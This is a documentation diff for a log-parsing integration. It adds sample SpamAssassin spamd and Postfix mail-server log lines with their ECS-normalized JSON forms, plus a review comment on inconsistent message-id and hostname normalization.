-6 - DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_MESSAGE,RCVD_IN_DNSWL_MED,SPF_HELO_PASS,SPF_PASS scantime=2.6,size=7882,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=33278,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 33278 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd18.json" + + ```json + + { + "message": "spamd: connection from test.com [127.0.0.1]:33620 to port 783, fd 5", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "port": 783 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "test.com" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "test.com", + "domain": "test.com", + "ip": "127.0.0.1", + "port": 33620, + "registered_domain": "test.com", + "top_level_domain": "com" + } + } + + ``` + + +=== "wo_appname_spamd19.json" + + ```json + + { + "message": "spamd: connection from mx.example.org [127.0.0.1]:33620 to port 783, fd 5", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "port": 783 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "mx.example.org" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "mx.example.org", + "domain": "mx.example.org", + "ip": "127.0.0.1", + "port": 33620, + "registered_domain": "example.org", + "subdomain": "mx", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_spamd2.json" + + ```json + + { + 
"message": "spamd: connection from example.org [127.0.0.1]:53684 to port 783, fd 5", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "destination": { + "port": 783 + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "example.org" + ], + "ip": [ + "127.0.0.1" + ] + }, + "source": { + "address": "example.org", + "domain": "example.org", + "ip": "127.0.0.1", + "port": 53684, + "registered_domain": "example.org", + "top_level_domain": "org" + } + } + + ``` + + +=== "wo_appname_spamd20.json" + + ```json + + { + "message": "spamd: processing message for debian-spamd:118", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "!&!AAAAAAAAAAAYAAAAAAAAA111111111111111111111111111111111/22222222222222/u47tEBAAAAAA==@example.org" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_spamd21.json" + + ```json + + { + "message": "spamd: processing message for debian-spamd:117", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "!&!AAAAAAAAAAAuAAAAAAAAAOC333333333333333333333333333333333333333q555555555555555555555555555555555555555555555555=@yahoo.fr" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_spamd22.json" + + ```json + + { + "message": "spamd: processing message <0113018ecc14540b-4a312890-d3e4-4332-887c-1d5be7521aa1-000000@eu-west-3.amazonses.com> for debian-spamd:118", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "0113018ecc14540b-4a312890-d3e4-4332-887c-1d5be7521aa1-000000@eu-west-3.amazonses.com" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_spamd23.json" + + ```json + + { + "message": "spamd: processing message <55555555555555555555555555555555555-8nmAAKsF_9_U+fg@mail.gmail.com> for debian-spamd:118", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, 
+ "email": { + "message_id": "55555555555555555555555555555555555-8nmAAKsF_9_U+fg@mail.gmail.com" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_spamd24.json" + + ```json + + { + "message": "spamd: processing message <66666666666666666666666666666666666666@EXAMPLE.PROD.OUTLOOK.COM> for debian-spamd:117", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "66666666666666666666666666666666666666@EXAMPLE.PROD.OUTLOOK.COM" + }, + "network": { + "protocol": "smtp" + } + } + + ``` + + +=== "wo_appname_spamd3.json" + + ```json + + { + "message": "spamd: result: . -1 - AC_DIV_BONANZA,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H3,RCVD_IN_MSPIKE_WL,SPF_HELO_NONE,SPF_PASS,URI_NOVOWEL scantime=3.2,size=209868,user=debian-spamd,uid=117,required_score=5.0,rhost=test.host.test,raddr=127.0.0.1,rport=44702,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "test.host.test" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "test.host.test", + "domain": "test.host.test", + "ip": "127.0.0.1", + "port": 44702, + "subdomain": "test.host" + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd4.json" + + ```json + + { + "message": "spamd: result: . 
-1 - ANY_BOUNCE_MESSAGE,DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,FORGED_SPF_HELO,HTML_MESSAGE,OOOBOUNCE_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_NONE scantime=2.7,size=14228,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=36236,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 36236 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd5.json" + + ```json + + { + "message": "spamd: result: . -1 - APOSTROPHE_FROM,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,DKIM_VALID_EF,HTML_FONT_LOW_CONTRAST,HTML_MESSAGE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_PASS scantime=4.9,size=575869,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=41352,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 41352 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd6.json" + + ```json + + { + "message": "spamd: result: . 
-1 - DEAR_SOMETHING,DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,HTML_MESSAGE,PDS_BTC_ID,RCVD_IN_DNSWL_LOW,SPF_HELO_NONE,SPF_NONE scantime=5.3,size=468649,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=42678,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 42678 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd7.json" + + ```json + + { + "message": "spamd: result: . -1 - DEAR_SOMETHING,DMARC_PASS,HTML_MESSAGE,HTML_MIME_NO_HTML_TAG,MIME_HTML_ONLY,RCVD_IN_DNSWL_LOW,SPF_HELO_NONE,SPF_PASS scantime=2.8,size=3254,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45060,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 45060 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd8.json" + + ```json + + { + "message": "spamd: result: . 
-1 - DKIMWL_WL_HIGH,DKIM_SIGNED,DKIM_VALID,DKIM_VALID_AU,FORGED_SPF_HELO,HTML_MESSAGE,RCVD_IN_DNSWL_NONE,RCVD_IN_MSPIKE_H2,SPF_HELO_PASS,SPF_NONE scantime=2.3,size=10467,user=debian-spamd,uid=118,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=45920,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 45920 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + +=== "wo_appname_spamd9.json" + + ```json + + { + "message": "spamd: result: . -1 - DKIM_INVALID,DKIM_SIGNED,HEADER_FROM_DIFFERENT_DOMAINS,HTML_FONT_LOW_CONTRAST,HTML_MESSAGE,MIME_HTML_ONLY,RCVD_IN_MSPIKE_H2,SPF_HELO_NONE,SPF_PASS,T_REMOTE_IMAGE scantime=2.9,size=65264,user=debian-spamd,uid=117,required_score=5.0,rhost=127.0.0.1,raddr=127.0.0.1,rport=33254,mid=<111111111111111111111111111111111111@mx.example.org>,autolearn=disabled", + "event": { + "category": [ + "email" + ], + "type": [ + "info" + ] + }, + "email": { + "message_id": "<111111111111111111111111111111111111@mx.example.org>" + }, + "network": { + "protocol": "smtp" + }, + "related": { + "hosts": [ + "127.0.0.1" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "debian-spamd" + ] + }, + "source": { + "address": "127.0.0.1", + "domain": "127.0.0.1", + "ip": "127.0.0.1", + "port": 33254 + }, + "user": { + "name": "debian-spamd" + } + } + + ``` + + 
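Review bot: `email.message_id` is normalized inconsistently across the new spamd transformed samples. `wo_appname_spamd24.json` stores the id without angle brackets (`66666...@EXAMPLE.PROD.OUTLOOK.COM`, taken from `processing message <...>`), while `wo_appname_spamd3.json` through `wo_appname_spamd9.json` keep them (`<111...@mx.example.org>`, taken from `mid=<...>`). A rule or pivot that joins the "processing message" event to the later "result" event on `email.message_id` will never match; strip the brackets in the `mid=` branch of the parser so both paths agree. In the same samples, `rhost=127.0.0.1` ends up in `source.domain` and `related.hosts`; under ECS those carry hostnames, and `source.ip`/`related.ip` already hold the address, so only populate them when `rhost` is not an IP literal (`wo_appname_spamd3.json`, with `rhost=test.host.test`, shows the intended hostname case, and its `source.subdomain` of `test.host` is the only place the split is exercised).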
@@ -6532,6 +13013,7 @@ The following table lists the fields that are extracted, normalized under the EC |`file.name` | `keyword` | Name of the file including the extension, without the directory. | |`file.size` | `long` | File size in bytes. | |`network.protocol` | `keyword` | Application protocol name. | +|`postfix.headers.from` | `array` | | |`postfix.orig_to` | `keyword` | | |`source.address` | `keyword` | Source network address. | |`source.domain` | `keyword` | The domain name of the source. | diff --git a/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd_sample.md b/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd_sample.md index a2fe9a66dc..0c9310931a 100644 --- a/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd_sample.md +++ b/_shared_content/operations_center/integrations/generated/eb727929-6a06-4e68-a09d-cf0e5daf3ccd_sample.md @@ -108,6 +108,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "connection_limited_1" + + ``` + 53C2C140E40: host smtp.office365.com[52.97.201.210] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command) + ``` + + + === "counter" ``` @@ -180,6 +188,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "local5" + + ``` + B84078B26C7: to=proxy@example.localdomain, orig_to=sample.orig.to, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "local6" + + ``` + 04B953035FC2: to=john.doe@example.org, orig_to=jane.doe@example.com, relay=127.0.0.1:2525, delay=0.44, delays=0.13/0/0.02/0.29, dsn=2.0.0, status=sent (250 Ok) + ``` + + + === "message_id" ``` 
@@ -548,6 +572,14 @@ In this section, you will find examples of raw logs as generated natively by the +=== "postfix8" + + ``` + D2D459605C: Used TLS for smtp-in.example.com[5.6.7.8]:25 + ``` + + + === "postfix_cleanup1" ``` @@ -692,6 +724,22 @@ In this section, you will find examples of raw logs as generated natively by the +=== "replace_header_1" + + ``` + 95BCC140E40: replace: header From: Example Mailbox <[test@example.org](mailto:test@example.org)>: From: [noreply@example.org](mailto:noreply@example.org) + ``` + + + +=== "replace_header_2" + + ``` + 2F46A140256: replace: header 
From: "Example Help" , relay=none, delay=89758, delays=89758/0.02/0/0, dsn=4.4.1, status=deferred (delivery temporarily suspended: connect to mail.corp.com[1.1.1.1]:25: Connection timed out) 215 + ``` + + + +=== "wo_appname_appname_postfix_local" + + ``` + 11FDF5F62A: to=, relay=local, delay=80181, delays=80181/0.02/0/0, dsn=4.0.0, status=deferred (user lookup error) + ``` + + + +=== "wo_appname_bounced" + + ``` + 3D770111AF50: to=, relay=none, delay=1.2, delays=1.1/0/0.03/0, dsn=5.4.4, status=bounced (Host or domain name not found. Name service error for name=corp.com type=AAAA: Host not found) + ``` + + + +=== "wo_appname_cleanup" + + ``` + 77EFFC0015: warning: header Content-Disposition: inline; filename="image003.jpg"; size=26055;??creation-date="Thu, 12 Sep 2019 12:39:01 GMT";??modification-date="Thu, 12 Sep 2019 12:40:01 GMT" from mail.outbound.protection.outlook.com[1.1.1.1]; from=<> to= proto=ESMTP helo= + ``` + + + +=== "wo_appname_cleanup2" + + ``` + 3D770111AF50: warning: header Subject: Manquants LASTNAME GB Nouvelle version from unknown[10.1.1.1]; from= to= proto=ESMTP helo= + ``` + + + +=== "wo_appname_cleanup3" + + ``` + 2CE6C111AF50: warning: header Subject: =?ISO-8859-1?Q?Pb_FTP_=3A_999_Aucune_action_effectu=E9e?= from unknown[10.1.1.1]; from= to= proto=ESMTP helo= 279 + ``` + + + +=== "wo_appname_cleanup4" + + ``` + B4B613F8B7: warning: header Content-Disposition: inline; filename="image001.png"; size=8879;??creation-date="Thu, 14 Mar 2024 10:19:00 GMT";??modification-date="Thu, 14 Mar 2024 10:19:00 GMT" from subdomain.key.corp.com[1.1.1.1]; from= to= proto=ESMTP helo= + ``` + + + +=== "wo_appname_cleanup5" + + ``` + 707A12000A: warning: header Content-Disposition: attachment;??filename="?iso-8859-2?q?representative_on_migration.pdf?="; size=259210;?? 
from local; from= to= + ``` + + + +=== "wo_appname_client" + + ``` + 486D13F8B7: client=COMPUTER.sub.corp.com[1.1.1.1] + ``` + + + +=== "wo_appname_client_address_field_with_mask" + + ``` + 8116C5F683: action=pass, reason=client whitelist, client_name=mail-corp123.outbound.protection.outlook.com, client_address=1.1.1.1/32, sender=firstname.lastname@corp.fr, recipient=firstname.lastname@corp2.fr + ``` + + + +=== "wo_appname_connect" + + ``` + disconnect from unknown[1.1.1.1] ehlo=1 mail=1 rcpt=0/1 quit=1 commands=3/4 + ``` + + + +=== "wo_appname_connection_limited" + + ``` + 53C2C140E40: host smtp.office365.com[1.1.1.1] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. [Hostname=P212321.PROD.OUTLOOK.COM] (in reply to end of DATA command) + ``` + + + +=== "wo_appname_connection_limited_1" + + ``` + 53C2C140E40: host smtp.office365.com[52.97.201.210] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. 
[Hostname=1111111111111.US0394.PROD.OUTLOOK.COM] (in reply to end of DATA command) + ``` + + + +=== "wo_appname_counter" + + ``` + disconnect from localhost[127.0.0.1] ehlo=2 starttls=1 mail=1 rcpt=1 data=1 quit=1 commands=7 + ``` + + + +=== "wo_appname_counter2" + + ``` + disconnect from localhost[127.0.0.1] ehlo=2 starttls=1 mail=1 rcpt=1 data=1 quit=1 commands=7 93 + ``` + + + +=== "wo_appname_counter3" + + ``` + disconnect from unknown[1.1.1.1] ehlo=1 mail=1 rcpt=2 data=1 quit=1 commands=6 137 + ``` + + + +=== "wo_appname_delivered_via_spamfilter" + + ``` + EF0B15F675: to=, relay=spamfilter, delay=4.2, delays=1.6/0/0/2.6, dsn=2.0.0, status=sent (delivered via spamfilter service) 148 + ``` + + + +=== "wo_appname_dns" + + ``` + dns: new_dns_packet: domain is utf8 flagged: ns1.example.org + ``` + + + +=== "wo_appname_local1" + + ``` + 175127B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "wo_appname_local2" + + ``` + 1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service) + ``` + + + +=== "wo_appname_local3" + + ``` + 7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17) + ``` + + + +=== "wo_appname_local4" + + ``` + B84078B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "wo_appname_local5" + + ``` + B84078B26C7: to=proxy@example.localdomain, orig_to=sample.orig.to, relay=local, delay=0.05, delays=0.04/0.02/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "wo_appname_local6" + + ``` + 04B953035FC2: to=john.doe@example.org, orig_to=jane.doe@example.com, relay=127.0.0.1:2525, delay=0.44, delays=0.13/0/0.02/0.29, dsn=2.0.0, status=sent (250 Ok) + ``` + + + +=== "wo_appname_message_id" + + ``` + 476295F5AD: 
message-id= + ``` + + + +=== "wo_appname_message_id2" + + ``` + 123456789: message-id= + ``` + + + +=== "wo_appname_noqueue" + + ``` + NOQUEUE: filter: RCPT from foo.key.corp.com[192.168.1.1]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo= 294 + ``` + + + +=== "wo_appname_noqueue2" + + ``` + NOQUEUE: filter: RCPT from HOSTNAME.key.corp.com[192.168.1.1]: : Client host triggers FILTER smtp:[127.0.0.1]:10025; from= to= proto=ESMTP helo= 299 + ``` + + + +=== "wo_appname_nospam" + + ``` + Anonymous TLS connection established to example.org[1.2.3.4]:25: TLSv1.2 with cipher ADH-AES256-GCM-SHA384 (256/256 bits) + ``` + + + +=== "wo_appname_pass" + + ``` + action=pass, reason=triplet found, delay=2400, client_name=mordor.com, client_address=1.1.1.1, sender=mechant@mordor.com, recipient=Pipin.touque@lacomte.net + ``` + + + +=== "wo_appname_pass2" + + ``` + action=pass, reason=client AAA, client_name=example.com, client_address=1.2.3.4, sender=Coyotte@acme.com, recipient=BIPBIP.NEWMAN@acme.com + ``` + + + +=== "wo_appname_pickup1" + + ``` + E43D43F838: uid=117 from= + ``` + + + +=== "wo_appname_pipe1" + + ``` + 175127B26C7: to=, orig_to=, relay=local, delay=0.05, delays=0.04/0.01/0/0, dsn=2.0.0, status=sent (delivered to mailbox) + ``` + + + +=== "wo_appname_pipe2" + + ``` + 1176E3F820: to=, orig_to=, relay=spamfilter, delay=3.3, delays=0.78/0/0/2.5, dsn=2.0.0, status=sent (delivered via spamfilter service) + ``` + + + +=== "wo_appname_pipe3" + + ``` + 7B3643F820: to=, relay=127.0.0.1[127.0.0.1]:10025, delay=0.08, delays=0.03/0/0.01/0.05, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 837B35FD17) + ``` + + + +=== "wo_appname_policydspf1" + + ``` + Action: prepend: Text: Received-SPF: Permerror (mailfrom) identity=mailfrom; client-ip=1.1.1.1; helo=corp.com; envelope-from=ops@corp.com; receiver= Reject action: 550 5.7.23 210 + ``` + + + +=== "wo_appname_policydspf10" + + ``` + Action: prepend: Text: Received-SPF: Pass (sender SPF authorized) 
identity=helo; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=<>; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_policydspf11" + + ``` + Action: prepend: Text: Received-SPF: Softfail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=noreply@example.com; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_policydspf12" + + ``` + Neutral; identity=mailfrom; client-ip=1.2.3.4; helo=example.mail.protection.outlook.com; envelope-from=john.doem@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf13" + + ``` + None; identity=helo; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf14" + + ``` + Pass; identity=helo; client-ip=1.2.3.4; helo=mail.example.org; envelope-from=<>; receiver= + ``` + + + +=== "wo_appname_policydspf15" + + ``` + Pass; identity=mailfrom; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf16" + + ``` + Permerror; identity=helo; client-ip=1.2.3.4; helo=example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf17" + + ``` + Permerror; identity=mailfrom; client-ip=1.2.3.4; helo=example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf18" + + ``` + Permerror; identity=mailfrom; client-ip=1.2.3.4; helo=example.org; envelope-from=no-reply@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf19" + + ``` + Softfail; identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=noreply@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf2" + + ``` + Action: prepend: Text: Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=mx.example.com; envelope-from=prvs=30447fe13=no-reply@example.com; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_policydspf20" + + ``` + prepend 
Received-SPF: Fail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf21" + + ``` + prepend Received-SPF: Neutral (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf22" + + ``` + prepend Received-SPF: None (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf23" + + ``` + prepend Received-SPF: None (no SPF record) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf24" + + ``` + prepend Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf25" + + ``` + prepend Received-SPF: Pass (sender SPF authorized) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf26" + + ``` + prepend Received-SPF: Permerror (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf27" + + ``` + prepend Received-SPF: Softfail (domain owner discourages use of this host) identity=helo; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf28" + + ``` + prepend Received-SPF: Softfail (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=smtp.example.org; envelope-from=jdoe@example.org; receiver= + ``` + + + +=== "wo_appname_policydspf3" + + ``` + Action: prepend Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=11.22.33.44; helo=mta-11-22-33-44.example.or; envelope-from=doe@newsletter.example.org; receiver= + ``` + + + +=== "wo_appname_policydspf4" 
+ + ``` + Pass; identity=mailfrom; client-ip=1.1.1.1; helo=mail.corp.com; envelope-from=username@corp.com; receiver= 131 + ``` + + + +=== "wo_appname_policydspf5" + + ``` + None; identity=helo; client-ip=1.1.1.1; helo=sub.corp.com; envelope-from=noreply@corp.com; receiver= 128 + ``` + + + +=== "wo_appname_policydspf6" + + ``` + Softfail; identity=mailfrom; client-ip=1.1.1.1; helo=corp.com; envelope-from=username@corp.com; receiver= 120 + ``` + + + +=== "wo_appname_policydspf7" + + ``` + Action: prepend: Text: Received-SPF: None (mailfrom) identity=mailfrom; client-ip=2.3.4.5; helo=[1.2.3.4]; envelope-from=jdoe@example.org; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_policydspf8" + + ``` + Action: prepend: Text: Received-SPF: None (no SPF record) identity=helo; client-ip=2.3.4.5; helo=posta.example.org; envelope-from=<>; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_policydspf9" + + ``` + Action: prepend: Text: Received-SPF: Pass (mailfrom) identity=mailfrom; client-ip=1.2.3.4; helo=example.outbound.protection.outlook.com; envelope-from=jdoe@example.org; receiver= Reject action: 550 5.7.23 + ``` + + + +=== "wo_appname_postfix1" + + ``` + 7B082110A6E0: host smtp.office365.com[40.101.136.242] said: 432 4.3.2 Concurrent connections limit exceeded. Visit https://aka.ms/concurrent_sending for more information. 
[Hostname=EXAMPLE.PROD.OUTLOOK.COM] (in reply to end of DATA command) + ``` + + + +=== "wo_appname_postfix2" + + ``` + 01B3A96050: Used TLS for 10.19.65.1[10.19.65.1]:587 + ``` + + + +=== "wo_appname_postfix3" + + ``` + 023069605C: Used TLS for smtp.example.org[163.172.55.8]:25 + ``` + + + +=== "wo_appname_postfix4" + + ``` + NOQUEUE: client=unknown[10.100.0.3] + ``` + + + +=== "wo_appname_postfix5" + + ``` + warning: read TCP map reply from 127.0.0.1:10030: unexpected EOF (Operation now in progress) + ``` + + + +=== "wo_appname_postfix6" + + ``` + 0A90996059: to=, relay=localhost[127.0.0.1]:10025, conn_use=3, delay=5.2, delays=0/0/0/5.2, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 0BF0C9605C) + ``` + + + +=== "wo_appname_postfix7" + + ``` + proxy-accept: END-OF-MESSAGE: 250 2.0.0 Ok: queued as 7949396087; from= to= proto=ESMTP helo= + ``` + + + +=== "wo_appname_postfix8" + + ``` + D2D459605C: Used TLS for smtp-in.example.com[5.6.7.8]:25 + ``` + + + +=== "wo_appname_postfix_cleanup1" + + ``` + 581B85F5B3: warning: header Content-Disposition: inline; filename=""image018.png""; size=162328;??creation-date=""Thu, 11 Apr 2024 07:53:08 GMT"";??modification-date=""Thu, 11 Apr 2024 07:53:08 GMT"" from local; from= to= + ``` + + + +=== "wo_appname_postfix_cleanup2" + + ``` + 59B835F5AD: warning: header Content-Disposition: attachment;??filename=""=?utf-8?B?111111111111111111111111111111111111111111111111111111111111?=? =?utf-8?B?222222222222222222222222222222222222222222222222222222222222?=? =?utf-8? from local; from= to= + ``` + + + +=== "wo_appname_postfix_cleanup3" + + ``` + EBA403F815: message-id=<74c99d8a-eb8b-4045-ae8e-6d3f6d51b41d@example.org> + ``` + + + +=== "wo_appname_postfix_no_spam_cleanup1" + + ``` + 000FA5FD8F: prepend: header From: John Doe from localhost[127.0.0.1]; from= to= proto=ESMTP helo=: X-NMFP-TRUST: TRUE + ``` + + + +=== "wo_appname_postfix_no_spam_cleanup2" + + ``` + 008BB5FD76: prepend: header 
